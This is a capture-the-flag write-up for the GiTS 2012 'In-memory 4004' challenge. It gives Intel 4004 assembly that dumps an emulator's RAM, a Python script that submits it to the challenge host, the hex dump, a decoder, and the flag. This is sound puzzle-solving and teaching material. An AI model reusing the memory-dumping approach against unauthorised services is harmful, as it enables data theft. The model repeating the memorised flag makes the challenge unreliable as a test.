codezen.fr code hacking, zen coding

29 Jan 2012

GiTS 2012 In-memory 4004 Write-up

In this challenge, we connect to a service running on port 4004:

$ nc inmemory.final2012.ghostintheshellcode.com 4004
Written in memory of a great microprocessor.
Waiting for program...
Too slow!
A great microprocessor, port 4004, waiting for a program... could this be an Intel 4004 emulator?
Checking the documentation for the Intel 4004, we see it had a 4096-byte PROM, so we send 4096 bytes down the wire and indeed:

Written in memory of a great microprocessor
Waiting for program...
Loading program onto PROM...
Executing program...
Cycle limit reached!
Exiting...
In-memory... so the key is probably sitting in the emulator's RAM. We used http://e4004.szyc.org/ extensively to design a small program that scans all of the RAM and writes each nibble to the ROM port.
Intel 4004 code:

init
        LDM 0          ; accumulator = 0
        DCL            ; select RAM bank 0 (change the LDM value to dump the other banks)
        FIM R0R1, 0    ; initialize R0=R1=0
        FIM R2R3, 0    ; initialize R2=R3=0
        LDM 12         ; load 12 to accumulator
        XCH R2         ; initialize R2=12
loop1
        SRC R0R1       ; select register & address
        RDM            ; load accumulator from RAM
        WRR            ; write accumulator to ROM port
        ISZ R1, loop1  ; loop 16 times (addresses 0..15 of the register)
        ISZ R0, loop1  ; next register (16 registers = the whole bank)
        ISZ R2, loop1  ; loop 4 times (R2 = 12..15, so the bank is dumped 4 times)
We use the assembler on the website to get the object code and send it with a simple Python program:

#!/usr/bin/env python3

# aXs ^ Big-Daddy

import socket
import sys

if len(sys.argv) != 3:
    print('\nUsage:\t./inmemory.py [host] [port]')
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # create the socket
s.connect((host, port))  # connect to the service

data = s.recv(65536)  # banner: "Written in memory of a great microprocessor."
print('Received', repr(data))
data = s.recv(65536)  # "Waiting for program..."
print('Received', repr(data))

# Object code produced by the e4004 assembler for the RAM-dump program above:
# LDM 0 / DCL / FIM R0R1,0 / FIM R2R3,0 / LDM 12 / XCH R2 / SRC R0R1 / RDM / WRR /
# ISZ R1,8 / ISZ R0,8 / ISZ R2,8   (loop1 sits at PROM address 8)
crash = b'\xD0\xFD\x20\x00\x22\x00\xDC\xB2\x21\xE9\xE2\x71\x08\x70\x08\x72\x08'

# The PROM is 4096 bytes: pad the program with NOPs (0x00) to fill it
crash += b'\x00' * (4096 - len(crash))

s.sendall(crash)

# Read the emulator's output until the service closes the connection
while True:
    line = s.recv(4096)
    if not line:
        break
    print('Received', repr(line))

s.close()
The emulator was *very* unreliable on the challenge service, and you needed to run the program something like 20 times before getting a clean run.
Result:

$ python inmemory.py inmemory.final2012.ghostintheshellcode.com 4004
Received 'Written in memory of a great microprocessor.\n'
Received 'Waiting for program...\n'
Received 'Loading program onto PROM...\n'
Received 'Executing program...\n
500000000000000040000000000000006000000000000000f0000000000000006000000000000000
c0000000000000006000000000000000400000000000000050000000000000009000000000000000
6000000000000000f000000000000000700000000000000050000000000000004000000000000000
9000000000000000500000000000000040000000000000006000000000000000f000000000000000
6000000000000000c000000000000000600000000000000040000000000000005000000000000000
90000000000000006000000000000000f00000000000000070000000000000005000000000000000
40000000000000009000000000000000500000000000000040000000000000006000000000000000
f0000000000000006000000000000000c00000000000000060000000000000004000000000000000
500000000000000090000000000000006000000000000000f0000000000000007000000000000000
50000000000000004000000000000000900000000000000050000000000000004000000000000000
6000000000000000f0000000000000006000000000000000c0000000000000006000000000000000
4000000000000000500000000000000090000000000000006000000000000000f000000000000000
70000000000000005000000000000000400000000000000090000000000000005000000000000000
40000000000000006000000000000000f0000000000000006000000000000000c000000000000000
60000000000000004000000000000000500000000000000090000000000000006000000000000000
f0000000000000007000000000000000500000000000000040000000000000009000000000000000
500000000000000040000000000000006000000000000000f0000000000000006000000000000000
c0000000000000006000000000000000400000000000000050000000000000009000000000000000
6000000000000000f000000000000000700000000000000050000000000000004000000000000000
9000000000000000500000000000000040000000000000006000000000000000f000000000000000
6000000000000000c000000000000000600000000000000040000000000000005000000000000000
90000000000000006000000000000000f00000000000000070000000000000005000000000000000
40000000000000009000000000000000500000000000000040000000000000006000000000000000
f0000000000000006000000000000000c00000000000000060000000000000004000000000000000
500000000000000090000000000000006000000000000000f0000000000000007000000000000000
500000000000000040000000000000009000000000000000
Cycle limit reached!
Exiting...

You then rerun it with the first LDM changed to 1 (DCL selects the RAM bank from the accumulator) to dump the next RAM bank.
The pattern repeats several times. Reading the first hex digit of each 16-character group in the dump gives 546f6c64596f7549546f6c64596f7 = ToldYouI (the first 16 digits, 546f6c64596f7549, are the ASCII bytes of ToldYouI; the rest is the start of the next repetition).
You keep converting until you have assembled the full key from all the RAM banks.
Key: ToldYouItWasInMemory
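To turn a dump like the one above into text, here is an added decoder (not part of the original post): every WRR shows up in the transcript as a 16-hex-character group whose first digit is the 4-bit port value, so the decoder collects those digits, pairs them high-nibble-first into bytes, and trims the repeated copies that the outer loop produces. The sample input is the first four lines of the bank-0 dump above.

```python
"""Decode the In-memory 4004 emulator's ROM-port dump into ASCII."""

# First four lines of the bank-0 dump from the transcript above (20 WRR groups).
SAMPLE_DUMP = (
    "500000000000000040000000000000006000000000000000f0000000000000006000000000000000"
    "c0000000000000006000000000000000400000000000000050000000000000009000000000000000"
    "6000000000000000f000000000000000700000000000000050000000000000004000000000000000"
    "9000000000000000500000000000000040000000000000006000000000000000f000000000000000"
)

GROUP = 16  # hex characters the emulator prints per WRR; the value is the first digit


def nibbles(dump):
    """Return the 4-bit values written to the ROM port, in program order."""
    text = "".join(dump.split())  # tolerate the line wrapping of the transcript
    if len(text) % GROUP:
        raise ValueError("dump length is not a multiple of %d" % GROUP)
    return [int(text[i], 16) for i in range(0, len(text), GROUP)]


def nibbles_to_bytes(values):
    """Pair consecutive nibbles high-first (RDM walks addresses 0, 1, 2, ...)."""
    if len(values) % 2:
        values = values[:-1]  # a run cut off by the cycle limit leaves half a byte
    return bytes((values[i] << 4) | values[i + 1] for i in range(0, len(values), 2))


def shortest_period(data):
    """Length of the repeating unit: the outer ISZ R2 loop replays the same bank."""
    for n in range(1, len(data) + 1):
        if all(data[i] == data[i % n] for i in range(len(data))):
            return n
    return len(data)


def decode_bank(dump):
    """ASCII content of one RAM bank, with the repeated copies removed."""
    data = nibbles_to_bytes(nibbles(dump))
    return data[:shortest_period(data)].decode("ascii", "replace")


if __name__ == "__main__":
    print(decode_bank(SAMPLE_DUMP))  # ToldYouI
```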

Posted by aXs
